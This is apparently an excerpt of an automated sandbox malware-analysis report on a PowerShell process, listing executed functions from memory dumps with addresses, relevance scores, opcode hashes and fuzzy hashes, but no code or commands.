                                                                  • Snapshot File: hcaresult_4_2_7ff848f50000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1e28d8d998f8773f4ea3c9bf34a5f0596705f5d63c0398acb172111be7409aad
                                                                  • Instruction ID: b89bbe1f439ea85a9d57733bedfdfe87b0fd197152f297ca9a4afb216994bf01
                                                                  • Opcode Fuzzy Hash: 1e28d8d998f8773f4ea3c9bf34a5f0596705f5d63c0398acb172111be7409aad
                                                                  • Instruction Fuzzy Hash: CBE0D832F1DE554DFB49661C78020F8B3E1DF81170B48147FD10EC3083DA16A8160249

                                                                  Executed Functions

                                                                  Function 04ADE918 Relevance: .3, Instructions: 281COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2389643120.0000000004AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AD0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_4ad0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8f90927b7b38fac0e42b867d01e6099897c652d89b1900759557b0f3a9560a99
                                                                  • Instruction ID: ed7b3c5e08df0ee5d73a03dc20ecb21f2edeb9f5278186f45660a4d4eba83074
                                                                  • Opcode Fuzzy Hash: 8f90927b7b38fac0e42b867d01e6099897c652d89b1900759557b0f3a9560a99
                                                                  • Instruction Fuzzy Hash: EBB16F70E00609DFDF14CFA9C9857DEBBF2BF88315F148529D816AB254EB74A842CB91
                                                                  Function 04ADF1E8 Relevance: .3, Instructions: 266COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2389643120.0000000004AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AD0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_4ad0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: fc034983f0573597ff3d2415ffb692a6c7ef755b5a4c0455234c007a453782c8
                                                                  • Instruction ID: f89114af002e496adde956f38ae629e4512cc5cc4b9d12e7695c8a756718a7ca
                                                                  • Opcode Fuzzy Hash: fc034983f0573597ff3d2415ffb692a6c7ef755b5a4c0455234c007a453782c8
                                                                  • Instruction Fuzzy Hash: 61B13E70E00209DFDF10CFA9D9857DEBBF2AF88714F148529E816AB254EB74A845CB85
                                                                  Function 04AD9219 Relevance: .1, Instructions: 119COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2389643120.0000000004AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AD0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_4ad0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3d3f17ef17a2e7ae54a8bfd31ef70958af6565ab93b5386e7be0b048ca62dc7e
                                                                  • Instruction ID: 9a6b740e51f05337293f2654af96b98efa31690ab31da1836abf43935e8a8379
                                                                  • Opcode Fuzzy Hash: 3d3f17ef17a2e7ae54a8bfd31ef70958af6565ab93b5386e7be0b048ca62dc7e
                                                                  • Instruction Fuzzy Hash: 29418975A002008FDB18DB74D958AAE7BBAAF8D300F045468E407EB7A5DB34AC81CB60
                                                                  Function 078D6138 Relevance: 23.5, Strings: 18, Instructions: 1030COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2414343552.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_78d0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (f#l$(f#l$(f#l$(f#l$(f#l$(f#l$(f#l$(f#l$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$tP]q$tP]q
                                                                  • API String ID: 0-4171516541
                                                                  • Opcode ID: a993c2aa6e244991b096e7503b396665fd9f8121bf59901228bf1b1165edd1ba
                                                                  • Instruction ID: e0f04de19924516248ee51b3d2e67ebce19db488408f9d0f16ad22855c836680
                                                                  • Opcode Fuzzy Hash: a993c2aa6e244991b096e7503b396665fd9f8121bf59901228bf1b1165edd1ba
                                                                  • Instruction Fuzzy Hash: 0582CFB0B00219DFDB24CF68C951B6ABBB2BF95310F1484AAD909EB355DB35EC41CB91
                                                                  Function 078D81F8 Relevance: 23.2, Strings: 18, Instructions: 692COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2414343552.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_78d0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4']q$4']q$4']q$4']q$4']q$4']q$tP]q$tP]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                                  • API String ID: 0-1355183119
                                                                  • Opcode ID: f89b35b0dfc9ba6aefa4e8ddf26a42fbd1e3804c2c2ada5664b091f58494eb0e
                                                                  • Instruction ID: 6ecf455ccbb4e9fc25bcc3727e6e1ee12f099864e347663a6487038e2c12fbc8
                                                                  • Opcode Fuzzy Hash: f89b35b0dfc9ba6aefa4e8ddf26a42fbd1e3804c2c2ada5664b091f58494eb0e
                                                                  • Instruction Fuzzy Hash: 5C3277B1B0420A9FCB258F69D45066ABBF2EF95310F1484BBD945CB291DB32DC41C7A2
                                                                  Function 078D2DE8 Relevance: 11.6, Strings: 9, Instructions: 336COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2414343552.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_78d0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4']q$4']q$84!l$84!l$tP]q$tP]q$$]q$$]q$$]q
                                                                  • API String ID: 0-2960685831
                                                                  • Opcode ID: efedae7affe57ceda0cb708df4c9ed06a6cef7c7e1789db8a3211d19cabe63f7
                                                                  • Instruction ID: 32c51edf4590311a3021586f881a43e4a53ff6b947caa15fb468e5ce944ee876
                                                                  • Opcode Fuzzy Hash: efedae7affe57ceda0cb708df4c9ed06a6cef7c7e1789db8a3211d19cabe63f7
                                                                  • Instruction Fuzzy Hash: A9B1F5B160434ADFC7258F28D850AAABFB6BF96310F1984A7D844CF652CB35DC45C7A2
                                                                  Function 078D5170 Relevance: 10.9, Strings: 8, Instructions: 948COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2414343552.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_78d0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (f#l$(f#l$(f#l$(f#l$(f#l$(f#l$(f#l$(f#l
                                                                  • API String ID: 0-4110764221
                                                                  • Opcode ID: 958c1836ebbe2c572c3df4e5e1fcd00b0cf5679024aa069fb6e97650fea6af1d
                                                                  • Instruction ID: 6656b5062997e33448d8d0be979c7bea6f696960cc877d933371bebd9c9832dd
                                                                  • Opcode Fuzzy Hash: 958c1836ebbe2c572c3df4e5e1fcd00b0cf5679024aa069fb6e97650fea6af1d
                                                                  • Instruction Fuzzy Hash: 63923BB4A00218DFD724CB18C951F6ABBB2BB95314F14C0AAD909EB355DB36ED81CF91
                                                                  Function 078D7C18 Relevance: 7.8, Strings: 6, Instructions: 339COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2414343552.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_78d0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4']q$4']q$4']q$4']q$4']q$4']q
                                                                  • API String ID: 0-471056614
                                                                  • Opcode ID: d57a43cd0c9447669f677a648fef05eaf55c8f4e077737586979ee15d64c365a
                                                                  • Instruction ID: 43800ee8bbaa1edadae4b81610be0874d7c133a65765db55a99c1dbb544b6a2c
                                                                  • Opcode Fuzzy Hash: d57a43cd0c9447669f677a648fef05eaf55c8f4e077737586979ee15d64c365a
                                                                  • Instruction Fuzzy Hash: B8D1AEB0A002189FCB14DF68C555BAEBBB2EF88714F14C469D805AF395CB76EC46CB91
                                                                  Function 078D5153 Relevance: 7.0, Strings: 5, Instructions: 753COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2414343552.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_78d0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (f#l$(f#l$(f#l$(f#l$(f#l
                                                                  • API String ID: 0-2572727945
                                                                  • Opcode ID: 23f776d56564f81c3a5146e8202ceaf61dccdf61e03a2bbcf0efa5d31f69ea94
                                                                  • Instruction ID: eb1e33959287fa393ee8e83fd5e976df41bb3d542f4c1ed51919361c32ea16ec
                                                                  • Opcode Fuzzy Hash: 23f776d56564f81c3a5146e8202ceaf61dccdf61e03a2bbcf0efa5d31f69ea94
                                                                  • Instruction Fuzzy Hash: B1722CB4A00215DFD724CB18C981F6ABBB2BB95314F14C0AAD949EB351DB72ED81CF91
                                                                  Function 078D6B4B Relevance: 5.4, Strings: 4, Instructions: 395COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2414343552.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_78d0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (f#l$(f#l$4']q$4']q
                                                                  • API String ID: 0-2190086065
                                                                  • Opcode ID: cae12edd3b55c8a0ee9aa2f82e9c0f6077d53db846e2e630711696d994428088
                                                                  • Instruction ID: f1cb2bfc37c0f4e31d81510c2f7f63047b64eb48ab532f0992ebdbf022724cb3
                                                                  • Opcode Fuzzy Hash: cae12edd3b55c8a0ee9aa2f82e9c0f6077d53db846e2e630711696d994428088
                                                                  • Instruction Fuzzy Hash: A4F1B2B0B002189FD724DB68C951B6EBBB3EF94700F1084A5D909AF395DF76AD818F91
                                                                  Function 04ADAE20 Relevance: 4.2, Strings: 3, Instructions: 459COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2389643120.0000000004AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AD0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_4ad0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Haq$$]q$$]q
                                                                  • API String ID: 0-1533201563
                                                                  • Opcode ID: 87c0c83ae94c87d74b1b440e0a7f7f6da3e55ba039ba93bbbd4fac01b94cf956
                                                                  • Instruction ID: c5ff25cc33de266b4bf387c64ce86ded67ff8a156a0e5d55890f3590b2497519
                                                                  • Opcode Fuzzy Hash: 87c0c83ae94c87d74b1b440e0a7f7f6da3e55ba039ba93bbbd4fac01b94cf956
                                                                  • Instruction Fuzzy Hash: 9F123F34B002188FDB25EB24D8547AEB7B2BF89704F1544E9D40AAB361DF35AE81CF91
                                                                  Function 078D8B08 Relevance: 4.0, Strings: 3, Instructions: 291COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2414343552.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_78d0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4']q$4']q$$]q
                                                                  • API String ID: 0-1444653880
                                                                  • Opcode ID: 6820880af59ffda732a7ba54e5234d36b4cd785f63d5cb3161fa484268ef502d
                                                                  • Instruction ID: 98aaea42e0ed22abe8bd2063a3276396530a82febb5fbbfb4e004979fe98c6fb
                                                                  • Opcode Fuzzy Hash: 6820880af59ffda732a7ba54e5234d36b4cd785f63d5cb3161fa484268ef502d
                                                                  • Instruction Fuzzy Hash: 93A16CF0B043199FCB159F38C86576ABBE2AFA1614F1484B6D905CF292DB35CC45C7A1
                                                                  Function 078D7C0E Relevance: 4.0, Strings: 3, Instructions: 261COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2414343552.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_78d0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4']q$4']q$4']q
                                                                  • API String ID: 0-705557208
                                                                  • Opcode ID: 8d20c878d2587d12bebf2b89b8c0047e178b37719315e23570e0ec266bb5f187
                                                                  • Instruction ID: ef690817467d67e41b602b4818e93a4551f8e98e6b1bbb7ef8f72be57841bd9a
                                                                  • Opcode Fuzzy Hash: 8d20c878d2587d12bebf2b89b8c0047e178b37719315e23570e0ec266bb5f187
                                                                  • Instruction Fuzzy Hash: 63A199B4A002089FCB14DF58C555BAEBBB2EF88714F14C429E804AF395CB76EC46CB91
                                                                  Function 078D4DC8 Relevance: 2.7, Strings: 2, Instructions: 247COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2414343552.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_78d0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (f#l$(f#l
                                                                  • API String ID: 0-2952237724
                                                                  • Opcode ID: 64ea1cf6bf3071dd5c3c3d4b4f9b476b18ca2d9c00340de992871723290e84cb
                                                                  • Instruction ID: a0790ce4b8fb1d08f6076406e7c723189c0409987783d5a4e29c914026d1c290
                                                                  • Opcode Fuzzy Hash: 64ea1cf6bf3071dd5c3c3d4b4f9b476b18ca2d9c00340de992871723290e84cb
                                                                  • Instruction Fuzzy Hash: 7C919FF0B10218AFC714DB68C551BAEBBE2EF98314F148465D909AF395CF76AC418BA1
                                                                  Function 078D5D22 Relevance: 1.7, Strings: 1, Instructions: 462COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2414343552.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_78d0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (f#l
                                                                  • API String ID: 0-4063606093
                                                                  • Opcode ID: 5c038693f45162539566353003b69b45c18f954ad5b6d5dcd2f2290e679142b0
                                                                  • Instruction ID: 90058fa4d46ebcd34a6a24c47056fa26d9c6251490ff5b0979e8e346e8977301
                                                                  • Opcode Fuzzy Hash: 5c038693f45162539566353003b69b45c18f954ad5b6d5dcd2f2290e679142b0
                                                                  • Instruction Fuzzy Hash: E7123DB4B00219DFD720CB18C951FA9BBB2FB95314F14C0A6D949AB351DB72ED818FA1
                                                                  Function 078D4DA8 Relevance: 1.5, Strings: 1, Instructions: 228COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2414343552.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_78d0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (f#l
                                                                  • API String ID: 0-4063606093
                                                                  • Opcode ID: 4077a243517ff61cc4ab231ae13f38d0e9933804b889b75826de79235f6cfcfd
                                                                  • Instruction ID: d35fc21e837bf111692a45b17ca11958c1f1dad94f7a94a2727cffcb3d139900
                                                                  • Opcode Fuzzy Hash: 4077a243517ff61cc4ab231ae13f38d0e9933804b889b75826de79235f6cfcfd
                                                                  • Instruction Fuzzy Hash: 249190F4B00254AFC714DB64C541BAEBBF2EF98314F148466E909AF395CB76AC41CBA1
                                                                  Function 078D8AEC Relevance: 1.4, Strings: 1, Instructions: 132COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2414343552.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_78d0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4']q
                                                                  • API String ID: 0-1259897404
                                                                  • Opcode ID: 26a7f46944269d02e5967df46be1a32171a6260c57f3b151894e0de73db9c1fa
                                                                  • Instruction ID: dd82c164003cd3a0480b3ee66e631fcd214cbd8515aab9779774a6ae64401eed
                                                                  • Opcode Fuzzy Hash: 26a7f46944269d02e5967df46be1a32171a6260c57f3b151894e0de73db9c1fa
                                                                  • Instruction Fuzzy Hash: 9C41E5F0B04306DFCB248F24C595B6ABBE2AFA5714F1480A6D905DB291D736DD80C7A1
                                                                  Function 04ADE90E Relevance: .3, Instructions: 276COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2389643120.0000000004AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AD0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_4ad0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 37692a899f2ac3e6c9d296d7be635f60e1007437dc22f6b8ed3c28237cb6e656
                                                                  • Instruction ID: 4d73fe496e5b7f330585c32a2008f6f704cffa5742f574efb7cc458e88670d49
                                                                  • Opcode Fuzzy Hash: 37692a899f2ac3e6c9d296d7be635f60e1007437dc22f6b8ed3c28237cb6e656
                                                                  • Instruction Fuzzy Hash: 55B16F70E00609DFDF10CFA9C9857DEBBF1BF88319F148529D816AB254EB74A846CB91
                                                                  Function 04AD8D38 Relevance: .3, Instructions: 266COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2389643120.0000000004AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AD0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_4ad0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b00fc5222a2b0a6e6b7eff4cde4b1f2faf48cbbd11b5def0705974b56ee059b4
                                                                  • Instruction ID: 2eb5e7655d1e3522c1a266c161ced039b4d885d5465ff92b0183c06346869a0d
                                                                  • Opcode Fuzzy Hash: b00fc5222a2b0a6e6b7eff4cde4b1f2faf48cbbd11b5def0705974b56ee059b4
                                                                  • Instruction Fuzzy Hash: C2A18175A00218DFDB14EFA4D948A9EBBB6FF88300F114558E406AF369DB74ED49CB80
                                                                  Function 04ADF1DC Relevance: .3, Instructions: 266COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2389643120.0000000004AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AD0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_4ad0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: aebad9f38ff91d136b1d39eeaf02cc53fd0e63916a2d6695957bfe115c52dfe1
                                                                  • Instruction ID: 1eef00f715255e752bfaf4bffa713a1e5741bfbf847c0db6c42dc414e0e8bd36
                                                                  • Opcode Fuzzy Hash: aebad9f38ff91d136b1d39eeaf02cc53fd0e63916a2d6695957bfe115c52dfe1
                                                                  • Instruction Fuzzy Hash: AFB14D70E00209DFDF10CFA9C9857DEBBF1BF48714F148529E816AB254EB74A885CB85
                                                                  Function 04AD8528 Relevance: .2, Instructions: 224COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2389643120.0000000004AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AD0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_4ad0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 116b1e06aa6336a4ad5976f94360205e9282ad412b6687f461ded2fc361ca224
                                                                  • Instruction ID: 0446aded7983ef87de9da16ba6e46fa0b65bf93da727304808a41b4d86eeea3c
                                                                  • Opcode Fuzzy Hash: 116b1e06aa6336a4ad5976f94360205e9282ad412b6687f461ded2fc361ca224
                                                                  • Instruction Fuzzy Hash: 26918E34A012449FCB15EF78D8449ADBBF2FF89310F1885ADE4569B361CB39E886CB50
                                                                  Function 04AD9488 Relevance: .2, Instructions: 193COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2389643120.0000000004AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AD0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_4ad0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b0027f8f660c4a93c1de544c0b305aec73ff1a41bb33f8da8fb93d8987598f33
                                                                  • Instruction ID: 00bb76bd35c7054d6e2cdc21522557a2228b16258820c907a8de0b23f40d0609
                                                                  • Opcode Fuzzy Hash: b0027f8f660c4a93c1de544c0b305aec73ff1a41bb33f8da8fb93d8987598f33
                                                                  • Instruction Fuzzy Hash: ED718F70A00249CFCB14DF68C880A9EBBFAFF89314F148969D416DB651DB75EC4ACB50
                                                                  Function 04AD95F6 Relevance: .2, Instructions: 188COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2389643120.0000000004AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AD0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_4ad0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 64025fd5ae6fbc2e566d984176eae080e02f5e742ce981e1393939465327d627
                                                                  • Instruction ID: bb5f0037e47dd955fb19a5548c5e6d208107215d46ac1a233a7a1f5643566781
                                                                  • Opcode Fuzzy Hash: 64025fd5ae6fbc2e566d984176eae080e02f5e742ce981e1393939465327d627
                                                                  • Instruction Fuzzy Hash: 89713C74A00248DFDB14DFB4D584AAEBBBABF88304F148529D416AB250DB75AC8ACF51
                                                                  Function 04ADEF60 Relevance: .2, Instructions: 180COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2389643120.0000000004AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AD0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_4ad0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 706b127f0bff2f65868399f14a0f33487cf6f7cd3f8297e926674327a934a3e9
                                                                  • Instruction ID: 619bcda8d51c7a2508393cf4ad564e0b6d035b6a464125c0a24bb3734247c89e
                                                                  • Opcode Fuzzy Hash: 706b127f0bff2f65868399f14a0f33487cf6f7cd3f8297e926674327a934a3e9
                                                                  • Instruction Fuzzy Hash: 10716F70E00209DFEF14CFA9C9457DEBBF2BF88714F148529E516AB254EB74A842CB91
                                                                  Function 04ADEF5E Relevance: .2, Instructions: 177COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2389643120.0000000004AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AD0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_4ad0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: fd91ff47cbe7c00407fd71b1c0d0a3c8960b7e911430026eae389632ac9036f2
                                                                  • Instruction ID: 091364c97ee10042f73a1416f396dd55596433391e8824bfd5189e3ff3ee5020
                                                                  • Opcode Fuzzy Hash: fd91ff47cbe7c00407fd71b1c0d0a3c8960b7e911430026eae389632ac9036f2
                                                                  • Instruction Fuzzy Hash: 72716E70E00249DFEF10CFA9D9857DEBBF1BF88714F148129E516A7254EB74A842CB91
                                                                  Function 078DA3CD Relevance: .1, Instructions: 133COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2414343552.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_78d0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ebdc9bed26e1995af7e2f675a91cfcd89516610038e702df83c6f89dc72fc5dd
                                                                  • Instruction ID: c2f002f40178f9cdfc6e25eeffc6317fb60496cb7db4b960a853e31885409d8c
                                                                  • Opcode Fuzzy Hash: ebdc9bed26e1995af7e2f675a91cfcd89516610038e702df83c6f89dc72fc5dd
                                                                  • Instruction Fuzzy Hash: D7417AF17001649BCB185B7894195AEBFD39FE1214B24C8BAC901DF201CE32DD02C7A3
                                                                  Function 04AD9473 Relevance: .1, Instructions: 118COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2389643120.0000000004AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AD0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_4ad0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a00efe32e6840219e5906c0d69ea43a51ff339c95d725029adf75e0a1b29d90f
                                                                  • Instruction ID: 6554d345348953f7ada9283272b5b47ff05e75d7a0f710f5c162888fae551f58
                                                                  • Opcode Fuzzy Hash: a00efe32e6840219e5906c0d69ea43a51ff339c95d725029adf75e0a1b29d90f
                                                                  • Instruction Fuzzy Hash: 02414070A00218DFDB28DFB5C58469EBBF6BF88310F148929D056AB6A4DB75A849CF50
                                                                  Function 078D803E Relevance: .1, Instructions: 102COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2414343552.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_78d0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6bf0fcec597f2c000f6c949bcf4bdd455e25f837aa9d5dcc6656b91f25b42c92
                                                                  • Instruction ID: 0cee60c36033bb5b3ea7a6a61a41bf157a827fcdadce4e1e41560e21a24e868d
                                                                  • Opcode Fuzzy Hash: 6bf0fcec597f2c000f6c949bcf4bdd455e25f837aa9d5dcc6656b91f25b42c92
                                                                  • Instruction Fuzzy Hash: 7F31B2B4740214BBDB04A768C955BAEBBB3EF84710F148424E905AF395CF7AAC45CBE1
                                                                  Function 078D0BB0 Relevance: .1, Instructions: 94COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2414343552.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_78d0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 27cca7a9c3055ebb955489545a2e8af5323deb236824c05b78c41cd3bc7bfe1a
                                                                  • Instruction ID: ca82ded39e486541aba250e76da7847626b72398f9bdd45dc4ebefcfd38aaed7
                                                                  • Opcode Fuzzy Hash: 27cca7a9c3055ebb955489545a2e8af5323deb236824c05b78c41cd3bc7bfe1a
                                                                  • Instruction Fuzzy Hash: 72218EB1314315ABC7245A79885073BB7C6ABD471AF108836D846DB281DE76CC41C370
